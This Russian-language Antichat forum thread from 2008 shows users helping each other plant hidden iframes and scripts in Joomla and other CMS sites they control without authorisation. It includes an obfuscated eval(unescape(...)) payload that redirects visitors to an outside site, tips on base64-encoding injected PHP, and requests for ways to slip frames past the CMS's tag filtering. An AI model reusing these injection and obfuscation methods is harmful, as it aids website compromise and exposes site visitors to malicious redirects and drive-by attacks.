ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.06.2008, 00:18
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
XaCeRoC, если ты хочешь профреймить php скрипт - то надо добавлять фрейм или после ?> или между <??> но с помощью echo '<iframe....';
|
|
|
09.06.2008, 03:12
|
|
Познающий
Регистрация: 25.04.2007
Сообщений: 44
Провел на форуме:
496902
Репутация:
11
|
|
Сообщение от Nek1t
Хм... А всмысле сам убирается?
Ты когда модуль редактируешь, то с помощью визуального редактора правишь? (ну там TinyMCE например) Или в чистом HTML?
Вообщем вот так? (на фон не обращай внимания...)
Или так?
Просто если WYSIWYG редактором, то он автоматически убирает теги <iframe> и <script>
Кстати, хотел делать инжект <iframe> через БД, но не в сам контент модуля, а в его заголовок. Делал с предварительным перекидыванием в HEX... Не вышло, видимо, джумла при самом выводе из БД прогоняет все через htmlspecialchars...
Я в чистый HTML добавляю как на 2 рисунке и он секунд 20 работает потом кудато изчезает странным образом 
|
|
|
|
09.06.2008, 12:11
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Хм... А точно не админ убирает? У меня такого никогда не было. Попробуй вставить iframe не через админку, а напрямую через БД.  |
|
|
|
09.06.2008, 22:46
|
|
Познающий
Регистрация: 25.04.2007
Сообщений: 44
Провел на форуме:
496902
Репутация:
11
|
|
ага это точно не админ убирает 100%  да и у меня такова тоже не когда не было =(
Там короче что то стоит так как вот сделал эксперимент тока что удалил нтмл код из меню прошло несколько сек и меню вернулось в начальный вид значит там какойто модуль стоит или еще что-то что возвращает все в исходный вид =(
Последний раз редактировалось ProoF; 10.06.2008 в 02:44..
|
|
|
|
10.06.2008, 14:24
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Эммм... Никогда такого не видел Стукни в аську - посмотрим
если ты хочешь профреймить php скрипт - то надо добавлять фрейм или после ?> или между <??> но с помощью echo '<iframe....';
Кстати, не знаю с чем это связано, но если в index.php у некоторых CMS добавлять
то скрипт не работает... приходилось делать
PHP код:
echo(base64_decode("HJ3HkqNQEk..."));
Последний раз редактировалось Nek1t; 10.06.2008 в 14:27..
|
|
|
|
10.06.2008, 14:51
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от Nek1t
Кстати, не знаю с чем это связано, но если в index.php у некоторых CMS добавлять
то скрипт не работает... приходилось делать
PHP код:
echo(base64_decode("HJ3HkqNQEk..."));
Связано это скорее всего с тем что ты забываешь экранироать кавычки:
В этом случае нужно экранировать все двойные кавычки:
Код:
echo "<ifame \"bla\"bla";
|
|
|
|
11.06.2008, 23:15
|
|
Познающий
Регистрация: 25.04.2007
Сообщений: 44
Провел на форуме:
496902
Репутация:
11
|
|
Теперь у меня проблема такая вставляю в контент фрейм от там сохранится но на самом сайте выводит к примеру если в ставить
<script type="text/javascript">
eval(unescape('%77%69%6E%64%6F%77%2E%6C%6F%63%61%7 4%69%6F%6E%20%3D%20%22%68%74%74%70%3A%2F%2F%77%77% 77%2E%68%69%64%65%6C%69%6E%6B%73%2E%63%6F%6D%2F%3F %39%31%6E%74%74%73%76%6C%68%6C%22%3B'));
</script>
то он выводит тока
<script type="text/javascript">
eval</script>
если просто <iframe то он вобще не чего не выводит хотя сохранено вобщем вопрос такой как еще можно замаскировать фрейм что бы его вставить?
|
|
|
|
19.06.2008, 23:29
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Итак. Апаю тему. Появились следующие траблы. Стали попадаться такие сайты, в которых iframe просто нереально вставить.
Джумла фильтруют любой вывод из БД, фильтруются все теги типа <iframe> и <script>. Они просто вырезаются. Фильтруется контент модулей и все остальное. Прав на запись в файлы нету!
Оооочень нужно поставить iframe, выслушаю любые идеи! 
|
|
|
|
19.06.2008, 23:31
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от Nek1t
Итак. Апаю тему. Появились следующие траблы. Стали попадаться такие сайты, в которых iframe просто нереально ваставить.
Джумла фильтруют любой вывод из БД, фильтруются все теги типа <iframe> и <script>.
Ну в таком случае сделай так:
https://forum.antichat.ru/showpost.p...4&postcount=10
Это конечно геморно, но сделав один раз - второй сделать будет уже легче) - там гарантировано будет выводиться все как надо, т.к. вывод будет из файла, туда и пхп код можно запихнуть.
|
|
|
|
19.06.2008, 23:50
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Ммм... За этот способ спс. Кое-где получилось Ну а если вообще нету прав на запись? Вообще нету, ниодной папки! |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
